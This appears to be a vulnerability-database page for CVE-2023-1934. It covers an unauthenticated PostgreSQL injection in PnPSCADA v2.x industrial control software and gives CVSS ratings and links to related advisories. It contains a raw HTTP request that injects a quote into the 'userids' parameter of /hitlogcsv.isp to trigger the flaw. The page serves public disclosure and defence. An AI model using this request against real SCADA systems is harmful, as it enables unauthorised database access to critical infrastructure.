Lucene search
Momen EldawakhlyEDB-ID:51448HistoryMay 23, 2023 - 12:00 a.m.
PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
2023-05-2300:00:00
Momen Eldawakhly
www.exploit-db.com
122
pnpscada
unauthenticated
postgresql
injection
unix
cve-2023-1934
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.003 Low
EPSS
Percentile
71.6%
# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
# Date: 15/5/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
# Vendor Homepage: https://pnpscada.com/
# Version: PnPSCADA (cross platforms): v2.x
# Tested on: Unix
# CVE : CVE-2023-1934
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8
SQLi crashing point:
GET /hitlogcsv.isp?userids=1337'&startdate=
2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00
HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)
AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0
Safari/534.14
Host: vulnerablepnpscada.int
Accept: */*
Accept-Encoding: gzip, deflate
Connection: closeRelated
prion
prion
Code injection
2023-05-12 14:15:00
zdt
zdt
PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Vulnerability
2023-05-23 00:00:00
cve
cve
CVE-2023-1934
2023-05-12 14:15:09
cvelist
cvelist
CVE-2023-1934
2023-05-12 13:18:25
packetstorm
packetstorm
PnPSCADA 2.x SQL Injection
2023-05-24 00:00:00
ics
ics
SDG PnPSCADA
2023-05-11 12:00:00
nvd
nvd
CVE-2023-1934
2023-05-12 14:15:09
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.003 Low
EPSS
Percentile
71.6%
Related for EDB-ID:51448